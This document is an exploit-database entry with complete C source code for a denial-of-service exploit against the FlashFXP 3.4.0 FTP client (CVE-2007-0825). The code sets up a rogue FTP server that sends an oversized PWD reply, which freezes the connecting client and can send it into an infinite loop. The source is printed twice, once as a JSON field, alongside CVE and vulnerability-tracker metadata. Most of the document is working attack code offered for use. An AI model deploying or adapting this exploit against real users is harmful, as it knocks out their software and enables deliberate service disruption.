FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow DoS Exploit
2007-02-06T00:00:00
ID EDB-ID:3276 Type exploitdb Reporter Marsu Modified 2007-02-06T00:00:00
Description
FlashFXP 3.4.0 build 1145 Remote Buffer Overflow DoS Exploit. CVE-2007-0825. Dos exploit for windows platform
/***************************************************************************
* FlashFXP V 3.4.0 build 1145 Buffer Overflow DoS *
* *
* *
* There's a strange bug in FlashFXP. *
* When sending a long PWD command with more than 5420 \ separated by at *
* least one different char, it is possible to make the app unstable. *
* It will first freeze during 45s consuming 100% resources, and then, if *
* the user hits disconnect and then reconnects to the server it will enter *
* in an infinite loop trying to put data on the stack. *
* *
* *
* I admit it is a little bit tricky but maybe someone will find a better *
* way to exploit this vuln. *
* *
* Have Fun! *
* *
* Coded by Marsu <Marsupilamipowa@hotmail.fr> *
***************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
char recvbuff[1024];
char evilbuff[11000];
sockaddr_in sin;
int server,client;
WSADATA wsaData;
WSAStartup(MAKEWORD(1,1), &wsaData);
int n=1;
while (n<=2)
{
server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_port = htons( 21 );
bind(server,(SOCKADDR*)&sin,sizeof(sin));
printf("[*] Listening on port 21...\n");
listen(server,5);
printf("[*] Waiting for client ...\n");
client=accept(server,NULL,NULL);
printf("[+] Client connected\n");
memcpy(evilbuff,"220 Hello there\r\n\0",18);
memset(recvbuff,'\0',1024);
if (send(client,evilbuff,strlen(evilbuff),0)==-1)
{
printf("[-] Error in send!\n");
exit(-1);
}
//USER
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"331 \r\n\0",7);
send(client,evilbuff,strlen(evilbuff),0);
Sleep(50);
//PASS
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"230 \r\n\0",7);
send(client,evilbuff,strlen(evilbuff),0);
//SYST
memset(recvbuff,'\0',1024);
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"215 WINDOWS\r\n\0",14);
send(client,evilbuff,strlen(evilbuff),0);
//FEAT
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"211 END\r\n\0",10);
send(client,evilbuff,strlen(evilbuff),0);
//PWD
int i=5;
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
while (i<10840) {
memset(evilbuff+i,'a',1);
i++;
memset(evilbuff+i,'//',1);
i++;
}
memcpy(evilbuff,"257 \"",5);
memcpy(evilbuff+10840,"\"\r\n\0",4);
send(client,evilbuff,strlen(evilbuff),0);
closesocket(client);
closesocket(server);
client=server=NULL;
if (n<2) {
printf("[+] Now FlashFXP is out for 45sec.\n");
printf("[+] Note that user MUST click on disconnect and then reconnect\n
to trigger the bug.\n\n");
}
n++;
}
Sleep(2000);
printf("\n[+] FlashFXP must be DoSed\n");
return 0;
}
// milw0rm.com [2007-02-06]
{"id": "EDB-ID:3276", "hash": "c3714f6cd9e1bf9c565e7acf13e14ac1", "type": "exploitdb", "bulletinFamily": "exploit", "title": "FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow DoS Exploit", "description": "FlashFXP 3.4.0 build 1145 Remote Buffer Overflow DoS Exploit. CVE-2007-0825. Dos exploit for windows platform", "published": "2007-02-06T00:00:00", "modified": "2007-02-06T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3276/", "reporter": "Marsu", "references": [], "cvelist": ["CVE-2007-0825"], "lastseen": "2016-01-31T18:06:55", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2016-01-31T18:06:55"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0825"]}, {"type": "osvdb", "idList": ["OSVDB:35796"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:2894"]}], "modified": "2016-01-31T18:06:55"}, "vulnersScore": 7.6}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3276/", "sourceData": "/***************************************************************************\r\n* FlashFXP V 3.4.0 build 1145 Buffer Overflow DoS *\r\n* *\r\n* *\r\n* There's a strange bug in FlashFXP. *\r\n* When sending a long PWD command with more than 5420 \\ separated by at *\r\n* least one different char, it is possible to make the app unstable. *\r\n* It will first freeze during 45s consuming 100% resources, and then, if *\r\n* the user hits disconnect and then reconnects to the server it will enter *\r\n* in an infinite loop trying to put data on the stack. *\r\n* *\r\n* *\r\n* I admit it is a little bit tricky but maybe someone will find a better *\r\n* way to exploit this vuln. *\r\n* *\r\n* Have Fun! *\r\n* *\r\n* Coded by Marsu <Marsupilamipowa@hotmail.fr> *\r\n***************************************************************************/\r\n\r\n\r\n\r\n#include \"winsock2.h\"\r\n#include \"stdio.h\"\r\n#include \"stdlib.h\"\r\n#include \"windows.h\"\r\n#pragma comment(lib, \"ws2_32.lib\")\r\n\r\nint main(int argc, char* argv[])\r\n{\r\n\tchar recvbuff[1024];\r\n\tchar evilbuff[11000];\r\n\tsockaddr_in sin;\r\n\tint server,client;\r\n\tWSADATA wsaData;\r\n\tWSAStartup(MAKEWORD(1,1), &wsaData);\r\n\r\n\tint n=1;\r\n\twhile (n<=2)\r\n\t{\r\n\t\tserver = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n\t\tsin.sin_family = PF_INET;\r\n\t\tsin.sin_addr.s_addr = htonl(INADDR_ANY);\r\n\t\tsin.sin_port = htons( 21 );\r\n\t\tbind(server,(SOCKADDR*)&sin,sizeof(sin));\r\n\t\tprintf(\"[*] Listening on port 21...\\n\");\r\n\t\tlisten(server,5);\r\n\t\tprintf(\"[*] Waiting for client ...\\n\");\r\n\t\tclient=accept(server,NULL,NULL);\r\n\t\tprintf(\"[+] Client connected\\n\");\r\n\r\n\r\n\t\tmemcpy(evilbuff,\"220 Hello there\\r\\n\\0\",18);\r\n\t\tmemset(recvbuff,'\\0',1024);\r\n\r\n\t\tif (send(client,evilbuff,strlen(evilbuff),0)==-1)\r\n\t\t{\r\n\t\t\tprintf(\"[-] Error in send!\\n\");\r\n\t\t\texit(-1);\r\n\t\t}\r\n\r\n\t\t//USER\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\tmemcpy(evilbuff,\"331 \\r\\n\\0\",7);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\t\tSleep(50);\r\n\r\n\t\t//PASS\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\tmemcpy(evilbuff,\"230 \\r\\n\\0\",7);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\r\n\t\t//SYST\r\n\t\tmemset(recvbuff,'\\0',1024);\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\tmemcpy(evilbuff,\"215 WINDOWS\\r\\n\\0\",14);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\r\n\t\t//FEAT\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\tmemcpy(evilbuff,\"211 END\\r\\n\\0\",10);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\r\n\t\t//PWD\r\n\t\tint i=5;\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\twhile (i<10840) {\r\n\t\t\tmemset(evilbuff+i,'a',1);\r\n\t\t\ti++;\r\n\t\t\tmemset(evilbuff+i,'//',1);\r\n\t\t\ti++;\r\n\t\t}\r\n\t\tmemcpy(evilbuff,\"257 \\\"\",5);\r\n\t\tmemcpy(evilbuff+10840,\"\\\"\\r\\n\\0\",4);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\t\tclosesocket(client);\r\n\t\tclosesocket(server);\r\n\t\tclient=server=NULL;\r\n\r\n\t\tif (n<2) {\r\n\t\t\tprintf(\"[+] Now FlashFXP is out for 45sec.\\n\");\r\n\t\t\tprintf(\"[+] Note that user MUST click on disconnect and then reconnect\\n \r\n to trigger the bug.\\n\\n\");\r\n\t\t}\r\n\t\tn++;\r\n\t}\r\n\tSleep(2000);\r\n\tprintf(\"\\n[+] FlashFXP must be DoSed\\n\");\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2007-02-06]\r\n", "osvdbidlist": ["35796"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "FlashFXP 3.4.0 build 1145 allows remote servers to cause a denial of service (CPU consumption) via a response to a PWD command that contains a long string with deeply nested directory structure, possibly due to a buffer overflow.", "modified": "2017-10-19T01:30:00", "id": "CVE-2007-0825", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0825", "published": "2007-02-07T22:28:00", "title": "CVE-2007-0825", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 32416\nGeneric Exploit URL: http://milw0rm.com/exploits/3276\n[CVE-2007-0825](https://vulners.com/cve/CVE-2007-0825)\nBugtraq ID: 22433\n", "modified": "2007-02-06T20:53:45", "published": "2007-02-06T20:53:45", "href": "https://vulners.com/osvdb/OSVDB:35796", "id": "OSVDB:35796", "title": "FlashFXP PWD Command Long String Remote DoS", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:17", "bulletinFamily": "software", "description": "Bugs during parsing FTP server data.", "modified": "2003-06-09T00:00:00", "published": "2003-06-09T00:00:00", "id": "SECURITYVULNS:VULN:2894", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:2894", "title": "Multiple bugs in FTP clients", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}